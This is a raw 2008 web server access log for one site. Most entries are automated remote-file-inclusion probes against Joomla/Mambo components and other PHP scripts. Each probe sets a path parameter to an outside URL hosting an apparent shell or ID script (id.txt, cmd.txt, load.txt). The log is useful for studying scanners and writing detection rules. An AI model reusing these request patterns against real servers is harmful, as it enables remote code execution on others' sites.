204.213.57.49 - - [14/Feb/2008:11:40:18 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
218.150.160.16 - - [14/Feb/2008:11:40:46 -0800] "GET /logs/access_080117.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.150.160.16 - - [14/Feb/2008:11:40:47 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.150.160.16 - - [14/Feb/2008:11:40:47 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.15.159.44 - - [14/Feb/2008:11:41:09 -0800] "GET /logs/access.log/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.wvcorrectionalindustries.com/phpdig/admin/temp/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [14/Feb/2008:11:42:21 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php=http://www.send2thailand.com/image/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [14/Feb/2008:11:42:21 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php=http://www.send2thailand.com/image/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.213.57.49 - - [14/Feb/2008:11:42:51 -0800] "GET /logs/access_080120.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
69.10.135.176 - - [14/Feb/2008:11:43:36 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://bastard0.interfree.it/mia/bao/asd/lol/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
69.10.135.176 - - [14/Feb/2008:11:43:36 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://bastard0.interfree.it/mia/bao/asd/lol/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
85.17.168.133 - - [14/Feb/2008:11:43:52 -0800] "GET /logs/access_080126.log//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.17.168.133 - - [14/Feb/2008:11:43:52 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.17.168.133 - - [14/Feb/2008:11:43:52 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.17.168.133 - - [14/Feb/2008:11:45:07 -0800] "GET /logs/access_080126.log//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.17.168.133 - - [14/Feb/2008:11:45:07 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.17.168.133 - - [14/Feb/2008:11:45:08 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.17.168.133 - - [14/Feb/2008:11:45:08 -0800] "GET /logs/access_080126.log//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.17.168.133 - - [14/Feb/2008:11:45:09 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.17.168.133 - - [14/Feb/2008:11:45:09 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [14/Feb/2008:11:47:00 -0800] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php=http://www.send2thailand.com/image/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
221.143.48.95 - - [14/Feb/2008:11:47:05 -0800] "GET /logs/access_080131.log/xGB.php?act=admin&do=http://xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.48.95 - - [14/Feb/2008:11:47:05 -0800] "GET /xGB.php?act=admin&do=http://xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.48.95 - - [14/Feb/2008:11:47:06 -0800] "GET /logs/xGB.php?act=admin&do=http://xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.69.32.173 - - [14/Feb/2008:11:48:05 -0800] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.50.26 - - [14/Feb/2008:11:48:26 -0800] "GET //atom.php5?page=http://www.stalkergameserver.com/website/templates/cv.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
64.38.50.26 - - [14/Feb/2008:11:48:27 -0800] "GET /logs//atom.php5?page=http://www.stalkergameserver.com/website/templates/cv.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
218.55.227.178 - - [14/Feb/2008:11:48:51 -0800] "GET /logs/access_080131.log/xGB.php?act=admin&do=http://xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.55.227.178 - - [14/Feb/2008:11:48:51 -0800] "GET /xGB.php?act=admin&do=http://xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.55.227.178 - - [14/Feb/2008:11:48:52 -0800] "GET /logs/xGB.php?act=admin&do=http://xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.10.135.176 - - [14/Feb/2008:11:50:04 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://bastard0.interfree.it/mia/bao/asd/lol/id.txt??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
69.10.135.176 - - [14/Feb/2008:11:50:04 -0800] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://bastard0.interfree.it/mia/bao/asd/lol/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
67.18.231.100 - - [14/Feb/2008:11:50:20 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.250.2.37 - - [14/Feb/2008:11:50:46 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
213.250.2.37 - - [14/Feb/2008:11:50:46 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
67.15.74.24 - - [14/Feb/2008:11:51:38 -0800] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://f1atope.com/modules/coppermine/themes/default/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.74.24 - - [14/Feb/2008:11:51:39 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://f1atope.com/modules/coppermine/themes/default/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.74.24 - - [14/Feb/2008:11:51:40 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://f1atope.com/modules/coppermine/themes/default/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.59.17.71 - - [14/Feb/2008:11:51:42 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
69.59.17.71 - - [14/Feb/2008:11:51:42 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
85.119.155.107 - - [14/Feb/2008:11:52:34 -0800] "GET /logs/access_080131.log/xGB.php?act=admin&do=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.119.155.107 - - [14/Feb/2008:11:52:34 -0800] "GET /xGB.php?act=admin&do=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.119.155.107 - - [14/Feb/2008:11:52:35 -0800] "GET /logs/xGB.php?act=admin&do=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.74.24 - - [14/Feb/2008:11:52:43 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://f1atope.com/modules/coppermine/themes/default/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.55.227.178 - - [14/Feb/2008:11:53:13 -0800] "GET /logs/access_080108.log/config.php?path_to_root=http://xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.55.227.178 - - [14/Feb/2008:11:53:13 -0800] "GET /config.php?path_to_root=http://xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.55.227.178 - - [14/Feb/2008:11:53:14 -0800] "GET /logs/config.php?path_to_root=http://xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.55.227.178 - - [14/Feb/2008:11:53:14 -0800] "GET /logs/access_080120.log/config.php?path_to_root=http://xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.86.123.61 - - [14/Feb/2008:11:54:36 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
80.86.123.61 - - [14/Feb/2008:11:54:36 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
69.10.135.176 - - [14/Feb/2008:11:55:11 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://bastard0.interfree.it/mia/bao/asd/lol/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
69.10.135.176 - - [14/Feb/2008:11:55:11 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://bastard0.interfree.it/mia/bao/asd/lol/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
74.6.24.150 - - [14/Feb/2008:11:55:19 -0800] "GET /tmp/?M=D HTTP/1.0" 200 1995 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
204.213.57.49 - - [14/Feb/2008:11:56:07 -0800] "GET /logs/access_080103.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
81.169.128.144 - - [14/Feb/2008:11:56:08 -0800] "GET /logs/access.log/administrator/components/com_comprofiler/admin.comprofiler.controller.php?mosConfig_absolute_path=http://www.hoopstar.ru/usr/xml/vi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.128.144 - - [14/Feb/2008:11:56:08 -0800] "GET /administrator/components/com_comprofiler/admin.comprofiler.controller.php?mosConfig_absolute_path=http://www.hoopstar.ru/usr/xml/vi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.213.57.49 - - [14/Feb/2008:11:56:08 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
81.169.128.144 - - [14/Feb/2008:11:56:09 -0800] "GET /logs/administrator/components/com_comprofiler/admin.comprofiler.controller.php?mosConfig_absolute_path=http://www.hoopstar.ru/usr/xml/vi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.213.57.49 - - [14/Feb/2008:11:56:09 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
221.143.48.95 - - [14/Feb/2008:11:56:11 -0800] "GET /logs/access_080108.log/config.php?path_to_root=http://xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.48.95 - - [14/Feb/2008:11:56:11 -0800] "GET /config.php?path_to_root=http://xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.48.95 - - [14/Feb/2008:11:56:12 -0800] "GET /logs/config.php?path_to_root=http://xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.48.95 - - [14/Feb/2008:11:56:17 -0800] "GET /logs/access_080120.log/config.php?path_to_root=http://xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.213.57.49 - - [14/Feb/2008:11:56:17 -0800] "GET /logs/access_080126.log/modules/My_eGallery/index.php?basepath=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
204.213.57.49 - - [14/Feb/2008:11:56:17 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
204.213.57.49 - - [14/Feb/2008:11:56:18 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
67.15.38.90 - - [14/Feb/2008:11:57:06 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
67.15.38.90 - - [14/Feb/2008:11:57:06 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
82.66.124.141 - - [14/Feb/2008:11:58:22 -0800] "GET /logs/access_080103.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
85.119.155.107 - - [14/Feb/2008:11:58:22 -0800] "GET /logs/access_080120.log/config.php?path_to_root=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.119.155.107 - - [14/Feb/2008:11:58:23 -0800] "GET /config.php?path_to_root=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.119.155.107 - - [14/Feb/2008:11:58:23 -0800] "GET /logs/config.php?path_to_root=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.66.124.141 - - [14/Feb/2008:11:58:26 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
82.66.124.141 - - [14/Feb/2008:11:58:27 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
85.119.155.107 - - [14/Feb/2008:11:59:10 -0800] "GET /logs/access_080108.log/config.php?path_to_root=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.149.197.252 - - [14/Feb/2008:11:59:21 -0800] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://j-vision.co.kr/company/mild/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.184.170 - - [14/Feb/2008:12:00:50 -0800] "GET /modules/poll/block_poll_cms.php?where_framework=http://paginas.terra.com.br/lazer/fatalzin/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
207.58.184.170 - - [14/Feb/2008:12:00:51 -0800] "GET /logs/modules/poll/block_poll_cms.php?where_framework=http://paginas.terra.com.br/lazer/fatalzin/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
203.152.41.4 - - [14/Feb/2008:12:00:58 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://phpbx.iespana.es/test.txt???? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
203.152.41.4 - - [14/Feb/2008:12:00:58 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://phpbx.iespana.es/test.txt???? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
67.18.231.100 - - [14/Feb/2008:12:01:06 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.170 - - [14/Feb/2008:12:01:08 -0800] "GET //vwar/convert/mvcw.php?vwar_root=http://paginas.terra.com.br/lazer/fatalzin/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
207.58.184.170 - - [14/Feb/2008:12:01:08 -0800] "GET /logs//vwar/convert/mvcw.php?vwar_root=http://paginas.terra.com.br/lazer/fatalzin/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
207.58.184.170 - - [14/Feb/2008:12:01:32 -0800] "GET /class/class.dashboard_cms.php?where_framework=http://paginas.terra.com.br/lazer/fatalzin/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
207.58.184.170 - - [14/Feb/2008:12:01:32 -0800] "GET /logs/class/class.dashboard_cms.php?where_framework=http://paginas.terra.com.br/lazer/fatalzin/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
195.70.35.179 - - [14/Feb/2008:12:01:45 -0800] "GET /presto/ HTTP/1.1" 200 526 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20061201 Firefox/2.0.0.6 (Ubuntu-feisty)" "www.dmulk.com"
194.213.194.42 - - [14/Feb/2008:12:03:43 -0800] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.fidanquetravel.com/images/PDF/foggian.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.60.70.58 - - [14/Feb/2008:12:04:53 -0800] "GET /logs/access_071221.log//?index.php?mosConfig_absolute_path=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.70.58 - - [14/Feb/2008:12:04:54 -0800] "GET //?index.php?mosConfig_absolute_path=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 200 2962 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.70.58 - - [14/Feb/2008:12:04:55 -0800] "GET /logs//?index.php?mosConfig_absolute_path=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 200 34548 "-" "libwww-perl/5.808" "www.dmulk.com"
85.17.168.133 - - [14/Feb/2008:12:05:21 -0800] "GET /logs/access_080126.log//components/com_simpleboard/image_upload.php?sbp=http://whgild.allhyper.com/red_king/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.17.168.133 - - [14/Feb/2008:12:05:21 -0800] "GET /logs/access_080126.log//components/com_simpleboard/image_upload.php?sbp=http://whgild.allhyper.com/red_king/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.17.168.133 - - [14/Feb/2008:12:05:21 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://whgild.allhyper.com/red_king/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.17.168.133 - - [14/Feb/2008:12:05:21 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://whgild.allhyper.com/red_king/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.17.168.133 - - [14/Feb/2008:12:05:22 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://whgild.allhyper.com/red_king/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.17.168.133 - - [14/Feb/2008:12:05:22 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://whgild.allhyper.com/red_king/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.231.100 - - [14/Feb/2008:12:05:46 -0800] "GET /logs/access_080123.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.231.100 - - [14/Feb/2008:12:05:47 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.231.100 - - [14/Feb/2008:12:06:24 -0800] "GET /logs/access_080120.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.28.233 - - [14/Feb/2008:12:08:48 -0800] "GET /presto/?N=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.18.231.100 - - [14/Feb/2008:12:09:43 -0800] "GET /logs/access_080103.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.231.100 - - [14/Feb/2008:12:09:43 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.138.142.22 - - [14/Feb/2008:12:12:30 -0800] "GET /logs/access_080122.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://zezaku.extra.hu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.138.142.22 - - [14/Feb/2008:12:12:30 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://zezaku.extra.hu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.138.142.22 - - [14/Feb/2008:12:12:31 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://zezaku.extra.hu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.138.142.22 - - [14/Feb/2008:12:12:35 -0800] "GET /logs/access_080122.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://gw-gold.net/dragoc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.138.142.22 - - [14/Feb/2008:12:12:35 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://gw-gold.net/dragoc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.138.142.22 - - [14/Feb/2008:12:12:36 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://gw-gold.net/dragoc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.213.57.49 - - [14/Feb/2008:12:13:23 -0800] "GET /logs/access_080121.log/modules/My_eGallery/index.php?basepath=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.149.197.252 - - [14/Feb/2008:12:13:25 -0800] "GET /logs/access.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://j-vision.co.kr/company/mild/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.149.197.252 - - [14/Feb/2008:12:13:26 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://j-vision.co.kr/company/mild/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.149.197.252 - - [14/Feb/2008:12:13:32 -0800] "GET /logs/access_080106.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://j-vision.co.kr/company/mild/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.205.57.2 - - [14/Feb/2008:12:15:11 -0800] "GET /logs/access.log/page.php5?id=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
